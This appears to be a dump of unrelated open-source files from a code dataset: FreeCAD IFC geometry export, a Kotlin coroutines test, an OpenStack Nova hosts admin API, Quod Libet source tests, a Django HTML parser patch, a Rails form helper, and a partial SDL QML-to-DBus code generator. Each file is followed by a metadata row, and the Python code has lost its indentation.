pxvc = ifcfile.createIfcDirection((1.0,0.0))
povc = ifcfile.createIfcCartesianPoint((0.0,0.0))
pt = ifcfile.createIfcAxis2Placement2D(povc,pxvc)
# extruded circle
if isinstance(p.Edges[0].Curve,Part.Circle):
profile = ifcfile.createIfcCircleProfileDef("AREA",None,pt, p.Edges[0].Curve.Radius)
# extruded ellipse
elif isinstance(p.Edges[0].Curve,Part.Ellipse):
profile = ifcfile.createIfcEllipseProfileDef("AREA",None,pt, p.Edges[0].Curve.MajorRadius, p.Edges[0].Curve.MinorRadius)
else:
curves = False
for e in p.Edges:
if isinstance(e.Curve,Part.Circle):
curves = True
# extruded polyline
if not curves:
w = Part.Wire(DraftGeomUtils.sortEdges(p.Edges))
pts = [ifcfile.createIfcCartesianPoint(tuple(v.Point)[:2]) for v in w.Vertexes+[w.Vertexes[0]]]
pol = ifcfile.createIfcPolyline(pts)
# extruded composite curve
else:
segments = []
last = None
edges = DraftGeomUtils.sortEdges(p.Edges)
for e in edges:
if isinstance(e.Curve,Part.Circle):
follow = True
if last:
if not DraftVecUtils.equals(last,e.Vertexes[0].Point):
follow = False
last = e.Vertexes[0].Point
else:
last = e.Vertexes[-1].Point
else:
last = e.Vertexes[-1].Point
p1 = math.degrees(-DraftVecUtils.angle(e.Vertexes[0].Point.sub(e.Curve.Center)))
p2 = math.degrees(-DraftVecUtils.angle(e.Vertexes[-1].Point.sub(e.Curve.Center)))
da = DraftVecUtils.angle(e.valueAt(e.FirstParameter+0.1).sub(e.Curve.Center),e.Vertexes[0].Point.sub(e.Curve.Center))
if p1 < 0:
p1 = 360 + p1
if p2 < 0:
p2 = 360 + p2
if da > 0:
follow = not(follow)
xvc = ifcfile.createIfcDirection((1.0,0.0))
ovc = ifcfile.createIfcCartesianPoint(tuple(e.Curve.Center)[:2])
plc = ifcfile.createIfcAxis2Placement2D(ovc,xvc)
cir = ifcfile.createIfcCircle(plc,e.Curve.Radius)
curve = ifcfile.createIfcTrimmedCurve(cir,[ifcfile.createIfcParameterValue(p1)],[ifcfile.createIfcParameterValue(p2)],follow,"PARAMETER")
else:
verts = [vertex.Point for vertex in e.Vertexes]
if last:
if not DraftVecUtils.equals(last,verts[0]):
verts.reverse()
last = e.Vertexes[0].Point
else:
last = e.Vertexes[-1].Point
else:
last = e.Vertexes[-1].Point
pts = [ifcfile.createIfcCartesianPoint(tuple(v)[:2]) for v in verts]
curve = ifcfile.createIfcPolyline(pts)
segment = ifcfile.createIfcCompositeCurveSegment("CONTINUOUS",True,curve)
segments.append(segment)
pol = ifcfile.createIfcCompositeCurve(segments,False)
profile = ifcfile.createIfcArbitraryClosedProfileDef("AREA",None,pol)
if profile:
xvc = ifcfile.createIfcDirection(tuple(r.Rotation.multVec(FreeCAD.Vector(1,0,0))))
zvc = ifcfile.createIfcDirection(tuple(r.Rotation.multVec(FreeCAD.Vector(0,0,1))))
ovc = ifcfile.createIfcCartesianPoint(tuple(r.Base))
lpl = ifcfile.createIfcAxis2Placement3D(ovc,zvc,xvc)
edir = ifcfile.createIfcDirection(tuple(FreeCAD.Vector(extrusionv).normalize()))
shape = ifcfile.createIfcExtrudedAreaSolid(profile,lpl,edir,extrusionv.Length)
shapes.append(shape)
solidType = "SweptSolid"
shapetype = "extrusion"
if not shapes:
# brep representation
fcshape = None
solidType = "Brep"
if subtraction:
if hasattr(obj,"Proxy"):
if hasattr(obj.Proxy,"getSubVolume"):
fcshape = obj.Proxy.getSubVolume(obj)
if not fcshape:
if hasattr(obj,"Shape"):
if obj.Shape:
if not obj.Shape.isNull():
fcshape = obj.Shape
elif hasattr(obj,"Terrain"):
if obj.Terrain:
if hasattr(obj.Terrain,"Shape"):
if obj.Terrain.Shape:
if not obj.Terrain.Shape.isNull():
fcshape = obj.Terrain.Shape
if fcshape:
solids = []
if fcshape.Solids:
dataset = fcshape.Solids
else:
dataset = fcshape.Shells
print "Warning! object contains no solids"
for fcsolid in dataset:
fcsolid.scale(0.001) # to meters
faces = []
curves = False
for fcface in fcsolid.Faces:
for e in fcface.Edges:
if not isinstance(e.Curve,Part.Line):
if e.curvatureAt(e.FirstParameter+(e.LastParameter-e.FirstParameter)/2) > 0.0001:
curves = True
break
if curves:
#shapetype = "triangulated"
#tris = fcsolid.tessellate(tessellation)
#for tri in tris[1]:
# pts = [ifcfile.createIfcCartesianPoint(tuple(tris[0][i])) for i in tri]
# loop = ifcfile.createIfcPolyLoop(pts)
# bound = ifcfile.createIfcFaceOuterBound(loop,True)
# face = ifcfile.createIfcFace([bound])
# faces.append(face)
fcsolid = Arch.removeCurves(fcsolid)
shapetype = "brep"
for fcface in fcsolid.Faces:
loops = []
verts = [v.Point for v in Part.Wire(DraftGeomUtils.sortEdges(fcface.OuterWire.Edges)).Vertexes]
c = fcface.CenterOfMass
v1 = verts[0].sub(c)
v2 = verts[1].sub(c)
n = fcface.normalAt(0,0)
if DraftVecUtils.angle(v2,v1,n) >= 0:
verts.reverse() # inverting verts order if the direction is couterclockwise
pts = [ifcfile.createIfcCartesianPoint(tuple(v)) for v in verts]
loop = ifcfile.createIfcPolyLoop(pts)
bound = ifcfile.createIfcFaceOuterBound(loop,True)
loops.append(bound)
for wire in fcface.Wires:
if wire.hashCode() != fcface.OuterWire.hashCode():
verts = [v.Point for v in Part.Wire(DraftGeomUtils.sortEdges(wire.Edges)).Vertexes]
v1 = verts[0].sub(c)
v2 = verts[1].sub(c)
if DraftVecUtils.angle(v2,v1,DraftVecUtils.neg(n)) >= 0:
verts.reverse()
pts = [ifcfile.createIfcCartesianPoint(tuple(v)) for v in verts]
loop = ifcfile.createIfcPolyLoop(pts)
bound = ifcfile.createIfcFaceBound(loop,True)
loops.append(bound)
face = ifcfile.createIfcFace(loops)
faces.append(face)
shell = ifcfile.createIfcClosedShell(faces)
shape = ifcfile.createIfcFacetedBrep(shell)
shapes.append(shape)
if shapes:
# set surface style
if FreeCAD.GuiUp and (not subtraction) and hasattr(obj.ViewObject,"ShapeColor"):
# only set a surface style if the object has no material.
# apparently not needed, no harm in having both.
#m = False
#if hasattr(obj,"BaseMaterial"):
# if obj.BaseMaterial:
# if "Color" in obj.BaseMaterial.Material:
# m = True
#if not m:
rgb = obj.ViewObject.ShapeColor[:3]
if rgb in surfstyles:
psa = surfstyles[rgb]
else:
col = ifcfile.createIfcColourRgb(None,rgb[0],rgb[1],rgb[2])
ssr = ifcfile.createIfcSurfaceStyleRendering(col,None,None,None,None,None,None,None,"FLAT")
iss = ifcfile.createIfcSurfaceStyle(None,"BOTH",[ssr])
psa = ifcfile.createIfcPresentationStyleAssignment([iss])
surfstyles[rgb] = psa
for shape in shapes:
isi = ifcfile.createIfcStyledItem(shape,[psa],None)
xvc = ifcfile.createIfcDirection((1.0,0.0,0.0))
zvc = ifcfile.createIfcDirection((0.0,0.0,1.0))
ovc = ifcfile.createIfcCartesianPoint((0.0,0.0,0.0))
gpl = ifcfile.createIfcAxis2Placement3D(ovc,zvc,xvc)
placement = ifcfile.createIfcLocalPlacement(None,gpl)
representation = ifcfile.createIfcShapeRepresentation(context,'Body',solidType,shapes)
productdef = ifcfile.createIfcProductDefinitionShape(None,None,[representation])
return productdef,placement,shapetype
def setRepresentation(representation):
"""Returns a shape from a 2D IfcShapeRepresentation"""
def getPolyline(ent):
pts = []
for p in ent.Points:
c = p.Coordinates
pts.append(FreeCAD.Vector(c[0],c[1],c[2] if len(c) > 2 else 0))
return Part.makePolygon(pts)
def getCircle(ent):
c = ent.Position.Location.Coordinates
c = FreeCAD.Vector(c[0],c[1],c[2] if len(c) > 2 else 0)
r = ent.Radius
return Part.makeCircle(r,c)
result = []
if representation.is_a("IfcShapeRepresentation"):
for item in representation.Items:
if item.is_a("IfcGeometricCurveSet"):
for el in item.Elements:
if el.is_a("IfcPolyline"):
result.append(getPolyline(el))
elif el.is_a("IfcCircle"):
result.append(getCircle(el))
elif el.is_a("IfcTrimmedCurve"):
base = el.BasisCurve
t1 = el.Trim1[0].wrappedValue
t2 = el.Trim2[0].wrappedValue
if not el.SenseAgreement:
t1,t2 = t2,t1
if base.is_a("IfcPolyline"):
bc = getPolyline(base)
result.append(bc)
elif base.is_a("IfcCircle"):
bc = getCircle(base)
e = Part.ArcOfCircle(bc.Curve,math.radians(t1),math.radians(t2)).toShape()
d = base.Position.RefDirection.DirectionRatios
v = FreeCAD.Vector(d[0],d[1],d[2] if len(d) > 2 else 0)
a = -DraftVecUtils.angle(v)
e.rotate(bc.Curve.Center,FreeCAD.Vector(0,0,1),math.degrees(a))
result.append(e)
return result | unknown | codeparrot/codeparrot-clean | ||
package kotlinx.coroutines.flow
import kotlinx.coroutines.testing.*
import kotlinx.coroutines.*
import org.junit.*
class SafeCollectorMemoryLeakTest : TestBase() {
// custom List.forEach impl to avoid using iterator (FieldWalker cannot scan it)
private inline fun <T> List<T>.listForEach(action: (T) -> Unit) {
for (i in indices) action(get(i))
}
@Test
fun testCompletionIsProperlyCleanedUp() = runBlocking {
val job = flow {
emit(listOf(239))
expect(2)
hang {}
}.transform { l -> l.listForEach { _ -> emit(42) } }
.onEach { expect(1) }
.launchIn(this)
yield()
expect(3)
FieldWalker.assertReachableCount(0, job) { it == 239 }
job.cancelAndJoin()
finish(4)
}
@Test
fun testCompletionIsNotCleanedUp() = runBlocking {
val job = flow {
emit(listOf(239))
hang {}
}.transform { l -> l.listForEach { _ -> emit(42) } }
.onEach {
expect(1)
hang { finish(3) }
}
.launchIn(this)
yield()
expect(2)
FieldWalker.assertReachableCount(1, job) { it == 239 }
job.cancelAndJoin()
}
} | kotlin | github | https://github.com/Kotlin/kotlinx.coroutines | kotlinx-coroutines-core/jvm/test/flow/SafeCollectorMemoryLeakTest.kt |
# Copyright (c) 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hosts admin extension."""
from oslo_log import log as logging
import six
import webob.exc
from nova.api.openstack import extensions
from nova import compute
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova.i18n import _LI
from nova import objects
LOG = logging.getLogger(__name__)
authorize = extensions.extension_authorizer('compute', 'hosts')
class HostController(object):
"""The Hosts API controller for the OpenStack API."""
def __init__(self):
self.api = compute.HostAPI()
super(HostController, self).__init__()
def index(self, req):
"""Returns a dict in the format:
| {'hosts': [{'host_name': 'some.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.other.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'some.celly.host.name',
| 'service': 'cells',
| 'zone': 'internal'},
| {'host_name': 'console1.host.com',
| 'service': 'consoleauth',
| 'zone': 'internal'},
| {'host_name': 'network1.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'netwwork2.host.com',
| 'service': 'network',
| 'zone': 'internal'},
| {'host_name': 'compute1.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'compute2.host.com',
| 'service': 'compute',
| 'zone': 'nova'},
| {'host_name': 'sched1.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'sched2.host.com',
| 'service': 'scheduler',
| 'zone': 'internal'},
| {'host_name': 'vol1.host.com',
| 'service': 'volume',
| 'zone': 'internal'}]}
"""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks
nova_context.require_admin_context(context)
filters = {'disabled': False}
zone = req.GET.get('zone', None)
if zone:
filters['availability_zone'] = zone
services = self.api.service_get_all(context, filters=filters,
set_zones=True)
hosts = []
for service in services:
hosts.append({'host_name': service['host'],
'service': service['topic'],
'zone': service['availability_zone']})
return {'hosts': hosts}
def update(self, req, id, body):
"""Updates a specified body.
:param body: example format {'status': 'enable',
'maintenance_mode': 'enable'}
"""
def read_enabled(orig_val, msg):
"""Checks a specified orig_val and returns True for 'enabled'
and False for 'disabled'.
:param orig_val: A string with either 'enable' or 'disable'. May
be surrounded by whitespace, and case doesn't
matter
:param msg: The message to be passed to HTTPBadRequest. A single
%s will be replaced with orig_val.
"""
val = orig_val.strip().lower()
if val == "enable":
return True
elif val == "disable":
return False
else:
raise webob.exc.HTTPBadRequest(explanation=msg % orig_val)
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
# See what the user wants to 'update'
params = {k.strip().lower(): v for k, v in six.iteritems(body)}
orig_status = status = params.pop('status', None)
orig_maint_mode = maint_mode = params.pop('maintenance_mode', None)
# Validate the request
if len(params) > 0:
# Some extra param was passed. Fail.
explanation = _("Invalid update setting: '%s'") % params.keys()[0]
raise webob.exc.HTTPBadRequest(explanation=explanation)
if orig_status is not None:
status = read_enabled(orig_status, _("Invalid status: '%s'"))
if orig_maint_mode is not None:
maint_mode = read_enabled(orig_maint_mode, _("Invalid mode: '%s'"))
if status is None and maint_mode is None:
explanation = _("'status' or 'maintenance_mode' needed for "
"host update")
raise webob.exc.HTTPBadRequest(explanation=explanation)
# Make the calls and merge the results
result = {'host': id}
if status is not None:
result['status'] = self._set_enabled_status(context, id, status)
if maint_mode is not None:
result['maintenance_mode'] = self._set_host_maintenance(context,
id, maint_mode)
return result
def _set_host_maintenance(self, context, host_name, mode=True):
"""Start/Stop host maintenance window. On start, it triggers
guest VMs evacuation.
"""
LOG.info(_LI("Putting host %(host_name)s in maintenance mode "
"%(mode)s."),
{'host_name': host_name, 'mode': mode})
try:
result = self.api.set_host_maintenance(context, host_name, mode)
except NotImplementedError:
msg = _("Virt driver does not implement host maintenance mode.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("on_maintenance", "off_maintenance"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _set_enabled_status(self, context, host_name, enabled):
"""Sets the specified host's ability to accept new instances.
:param enabled: a boolean - if False no new VMs will be able to start
on the host
"""
if enabled:
LOG.info(_LI("Enabling host %s.") % host_name)
else:
LOG.info(_LI("Disabling host %s.") % host_name)
try:
result = self.api.set_host_enabled(context, host_name=host_name,
enabled=enabled)
except NotImplementedError:
msg = _("Virt driver does not implement host disabled status.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
if result not in ("enabled", "disabled"):
raise webob.exc.HTTPBadRequest(explanation=result)
return result
def _host_power_action(self, req, host_name, action):
"""Reboots, shuts down or powers up the host."""
context = req.environ['nova.context']
authorize(context)
# NOTE(alex_xu): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
try:
result = self.api.host_power_action(context, host_name=host_name,
action=action)
except NotImplementedError:
msg = _("Virt driver does not implement host power management.")
raise webob.exc.HTTPNotImplemented(explanation=msg)
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
except exception.ComputeServiceUnavailable as e:
raise webob.exc.HTTPBadRequest(explanation=e.format_message())
return {"host": host_name, "power_action": result}
def startup(self, req, id):
return self._host_power_action(req, host_name=id, action="startup")
def shutdown(self, req, id):
return self._host_power_action(req, host_name=id, action="shutdown")
def reboot(self, req, id):
return self._host_power_action(req, host_name=id, action="reboot")
@staticmethod
def _get_total_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(total)',
'cpu': compute_node['vcpus'],
'memory_mb': compute_node['memory_mb'],
'disk_gb': compute_node['local_gb']}}
@staticmethod
def _get_used_now_resources(host_name, compute_node):
return {'resource': {'host': host_name,
'project': '(used_now)',
'cpu': compute_node['vcpus_used'],
'memory_mb': compute_node['memory_mb_used'],
'disk_gb': compute_node['local_gb_used']}}
@staticmethod
def _get_resource_totals_from_instances(host_name, instances):
cpu_sum = 0
mem_sum = 0
hdd_sum = 0
for instance in instances:
cpu_sum += instance['vcpus']
mem_sum += instance['memory_mb']
hdd_sum += instance['root_gb'] + instance['ephemeral_gb']
return {'resource': {'host': host_name,
'project': '(used_max)',
'cpu': cpu_sum,
'memory_mb': mem_sum,
'disk_gb': hdd_sum}}
@staticmethod
def _get_resources_by_project(host_name, instances):
# Getting usage resource per project
project_map = {}
for instance in instances:
resource = project_map.setdefault(instance['project_id'],
{'host': host_name,
'project': instance['project_id'],
'cpu': 0,
'memory_mb': 0,
'disk_gb': 0})
resource['cpu'] += instance['vcpus']
resource['memory_mb'] += instance['memory_mb']
resource['disk_gb'] += (instance['root_gb'] +
instance['ephemeral_gb'])
return project_map
def show(self, req, id):
"""Shows the physical/usage resource given by hosts.
:param id: hostname
:returns: expected to use HostShowTemplate.
ex.::
{'host': {'resource':D},..}
D: {'host': 'hostname','project': 'admin',
'cpu': 1, 'memory_mb': 2048, 'disk_gb': 30}
"""
context = req.environ['nova.context']
# NOTE(eliqiao): back-compatible with db layer hard-code admin
# permission checks. This has to be left only for API v2.0 because
# this version has to be stable even if it means that only admins
# can call this method while the policy could be changed.
nova_context.require_admin_context(context)
host_name = id
try:
compute_node = (
objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host_name))
except exception.NotFound as e:
raise webob.exc.HTTPNotFound(explanation=e.format_message())
instances = self.api.instance_get_all_by_host(context, host_name)
resources = [self._get_total_resources(host_name, compute_node)]
resources.append(self._get_used_now_resources(host_name,
compute_node))
resources.append(self._get_resource_totals_from_instances(host_name,
instances))
by_proj_resources = self._get_resources_by_project(host_name,
instances)
for resource in six.itervalues(by_proj_resources):
resources.append({'resource': resource})
return {'host': resources}
class Hosts(extensions.ExtensionDescriptor):
"""Admin-only host administration."""
name = "Hosts"
alias = "os-hosts"
namespace = "http://docs.openstack.org/compute/ext/hosts/api/v1.1"
updated = "2011-06-29T00:00:00Z"
def get_resources(self):
resources = [extensions.ResourceExtension('os-hosts',
HostController(),
collection_actions={'update': 'PUT'},
member_actions={"startup": "GET", "shutdown": "GET",
"reboot": "GET"})]
return resources | unknown | codeparrot/codeparrot-clean | ||
# Copyright 2014, 2015 Christoph Reiter
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
import os
import re
import pprint
from gi.repository import Gtk
from quodlibet.util import get_module_dir
from tests import TestCase
def iter_py_paths():
"""Iterates over all Python source files that are part of Quod Libet"""
import quodlibet
root = os.path.dirname(get_module_dir(quodlibet))
skip = [
os.path.join(root, "build"),
os.path.join(root, "dist"),
os.path.join(root, "docs"),
os.path.join(root, "dev-utils"),
os.path.join(root, "quodlibet", "packages"),
]
for dirpath, dirnames, filenames in os.walk(root):
if any((dirpath.startswith(s + os.sep) or s == dirpath)
for s in skip):
continue
for filename in filenames:
if filename.endswith('.py'):
yield os.path.join(dirpath, filename)
class TLicense(TestCase):
ALLOWED = ["""
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
""", """
Permission is hereby granted, free of charge, to any person obtaining
a copy of this software and associated documentation files (the
"Software"), to deal in the Software without restriction, including
without limitation the rights to use, copy, modify, merge, publish,
distribute, sublicense, and/or sell copies of the Software, and to
permit persons to whom the Software is furnished to do so, subject to
the following conditions:
The above copyright notice and this permission notice shall be included
in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
""",
]
def test_main(self):
allowed = []
for license in self.ALLOWED:
allowed.append("".join(license.split()))
found = set()
missing = []
for path in iter_py_paths():
header = b""
with open(path, "rb") as h:
for line in h:
line = line.strip()
if not line.startswith(b"#"):
break
header += line.lstrip(b"# ") + b"\n"
norm = b"".join(header.split())
norm = norm.decode("utf-8")
for license_ in allowed:
if license_ in norm:
found.add(license_)
break
else:
missing.append(path)
self.assertFalse(missing, msg="Missing license: %r" % missing)
assert len(allowed) == len(found)
class TStockIcons(TestCase):
def test_main(self):
# gtk setting keys start like stock icons, so white list them
white = [x.replace("_", "-") for x in
dir(Gtk.Settings.get_default().props) if x.startswith("gtk_")]
# older gtk doesn't have those, but we still have them in the source
white.append("gtk-dialogs-use-header")
white.append("gtk-primary-button-warps-slider")
# some more..
white.append("gtk-tooltip")
white.append("gtk-")
white.append("gtk-update-icon-cache-")
res = map(re.compile, [
"(Gtk\\.STOCK_[_A-Z]*)",
"[\"\'](gtk-[\\-a-z]*)",
])
errors = {}
for path in iter_py_paths():
with open(path, "rb") as h:
if path.endswith(("icons.py", "test_source.py")):
continue
data = h.read().decode("utf-8")
for r in res:
match = r.search(data)
if match:
group = match.group(1)
if group not in white:
errors.setdefault(group, []).append(path)
self.assertFalse(errors, msg=pprint.pformat(errors)) | unknown | codeparrot/codeparrot-clean | ||
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import re
from six.moves import html_parser as _HTMLParser
def parse_starttag_patched(self, i):
"""This method is a patched version of the parse_starttag method from
django.utils.html_parser.HTMLParser class, used to patch bug 1273943.
The code is taken from file django/utils/html_parser.py, commit 6bc1b22299.
"""
self.__starttag_text = None
endpos = self.check_for_whole_start_tag(i)
if endpos < 0:
return endpos
rawdata = self.rawdata
self.__starttag_text = rawdata[i:endpos]
# Now parse the data between i+1 and j into a tag and attrs
attrs = []
tagfind = re.compile('([a-zA-Z][-.a-zA-Z0-9:_]*)(?:\s|/(?!>))*')
match = tagfind.match(rawdata, i + 1)
assert match, 'unexpected call to parse_starttag()'
k = match.end()
self.lasttag = tag = match.group(1).lower()
while k < endpos:
m = _HTMLParser.attrfind.match(rawdata, k)
if not m:
break
attrname, rest, attrvalue = m.group(1, 2, 3)
if not rest:
attrvalue = None
elif (attrvalue[:1] == '\'' == attrvalue[-1:] or
attrvalue[:1] == '"' == attrvalue[-1:]):
attrvalue = attrvalue[1:-1]
if attrvalue:
attrvalue = self.unescape(attrvalue)
attrs.append((attrname.lower(), attrvalue))
k = m.end()
end = rawdata[k:endpos].strip()
if end not in (">", "/>"):
lineno, offset = self.getpos()
if "\n" in self.__starttag_text:
lineno = lineno + self.__starttag_text.count("\n")
offset = (len(self.__starttag_text)
- self.__starttag_text.rfind("\n"))
else:
offset = offset + len(self.__starttag_text)
self.error("junk characters in start tag: %r"
% (rawdata[k:endpos][:20],))
if end.endswith('/>'):
# XHTML-style empty tag: <span attr="value" />
self.handle_startendtag(tag, attrs)
else:
self.handle_starttag(tag, attrs)
if tag in self.CDATA_CONTENT_ELEMENTS:
self.set_cdata_mode(tag) # <--------------------------- Changed
return endpos | unknown | codeparrot/codeparrot-clean | ||
# frozen_string_literal: true
module ActionView
module Helpers
module Tags # :nodoc:
class NumberField < TextField # :nodoc:
def render
options = @options.stringify_keys
if range = options.delete("in") || options.delete("within")
options.update("min" => range.min, "max" => range.max)
end
@options = options
super
end
end
end
end
end | ruby | github | https://github.com/rails/rails | actionview/lib/action_view/helpers/tags/number_field.rb |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# @file make_qml_dbus_cpp.py
# @brief Generator of QML to QDbus C++ part
#
# This file is a part of HMI D-Bus layer.
#
# Copyright (c) 2014, Ford Motor Company
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with the
# distribution.
#
# Neither the name of the Ford Motor Company nor the names of its contributors
# may be used to endorse or promote products derived from this software
# without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR 'A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
from argparse import ArgumentParser
import os.path
from sys import argv
from xml.etree import ElementTree
from copy import copy
from ford_xml_parser import FordXmlParser, ParamDesc
from code_formatter import CodeBlock
class Impl(FordXmlParser):
def args_for_function_definition(self, params, iface_name, out):
for param_el in params:
param = self.make_param_desc(param_el, iface_name)
out.write('QVariant %s,' % (param.name))
out.write('Q%sValue hmi_callback' % prefix_class_item)
def make_requests_for_header(self, out):
for interface_el in self.el_tree.findall('interface'):
request_responses = self.find_request_response_pairs_by_provider(interface_el, "sdl")
for (request, response) in request_responses:
all_params = list()
for param_el in request.findall('param'):
all_params.append(param_el)
with CodeBlock(out) as output:
output.write("Q_INVOKABLE bool %s_%s(" % (interface_el.get('name'), request.get('name')))
impl.args_for_function_definition(all_params, interface_el.get('name'), out)
output.write(");\n")
def make_header_file(self, out):
out.write("class QDBusInterface;\n")
out.write("class RequestToSDL : public QObject\n")
out.write("{\n")
out.write(' Q_OBJECT\n')
out.write(" public:\n")
with CodeBlock(out) as output:
output.write("explicit RequestToSDL(QObject *parent = 0);\n")
output.write("~RequestToSDL();\n")
impl.make_requests_for_header(out)
out.write(" private:\n")
with CodeBlock(out) as output:
for interface_el in self.el_tree.findall('interface'):
output.write('QDBusInterface *%s;\n' % interface_el.get('name'))
out.write("};\n")
def qt_param_type(self, param):
if not param.mandatory:
param_copy = copy(param)
param_copy.mandatory = True
return "OptionalArgument< " + self.qt_param_type(param_copy) + " >"
if param.array:
param_copy = copy(param)
param_copy.array = False
if param.type == 'String':
return "QStringList"
return "QList< " + self.qt_param_type(param_copy) + " >"
if param.type == 'Integer' or param.enum:
return 'int'
elif param.type == 'String':
return 'QString'
elif param.type == 'Boolean':
return 'bool'
elif param.type == 'Float':
return 'double'
elif param.struct:
return "_".join(param.fulltype)
else:
raise RuntimeError('Unknown type: ' + param.type)
def make_requests_for_source(self, out):
for interface_el in self.el_tree.findall('interface'):
request_responses = self.find_request_response_pairs_by_provider(interface_el, "sdl")
for (request, response) in request_responses:
request_name = request.get('name')
iface_name = interface_el.get('name')
request_full_name = iface_name + '_' + request_name
out.write('bool RequestToSDL::' + request_full_name + '(')
for param_el in request.findall('param'):
out.write('QVariant %s, ' % (param_el.get('name')))
out.write('Q%sValue hmi_callback) {\n' % prefix_class_item)
with CodeBlock(out) as output:
output.write('LOG4CXX_TRACE(logger_, "ENTER");\n')
output.write('QList<QVariant> args;\n')
for param_el in request.findall('param'):
param = self.make_param_desc(param_el, iface_name)
output.write('%s %s;\n' % (impl.qt_param_type(param), param.name + "_tmp"))
output.write('if (VariantToValue(%s, %s)) {\n' % (param.name, param.name + '_tmp'))
with CodeBlock(output) as out:
self.write_param_validation(param, param.name + "_tmp",
"\nLOG4CXX_ERROR(logger_, \"%s in %s out of bounds\");\nreturn false" % (param.name, request_full_name),
out)
out.write('args << QVariant::fromValue(%s);\n' % (param.name + '_tmp'))
output.write('} else {\n')
with CodeBlock(output) as out:
out.write('LOG4CXX_ERROR(logger_, "%s in %s is NOT valid");\n' % (param.name, request_full_name))
out.write('return false;\n')
out.write('}\n')
output.write('new requests::' + request_full_name + '(hmi_callback, ' + interface_el.get('name') + ' , args, '
+ '"' + request_name + '");\n')
output.write('LOG4CXX_TRACE(logger_, "EXIT");\n')
output.write('return true;\n')
out.write('}\n\n')
def write_param_validation(self, param, param_name, fail_statement, out, level=0):
if not param.mandatory and (param.restricted or param.restrictedArray or (param.struct and any(map(lambda x: x.restricted, self.structs[param.fulltype])))):
out.write("if (%s.presence) {\n" % param_name)
param_copy = copy(param)
param_copy.mandatory = True
with CodeBlock(out) as out:
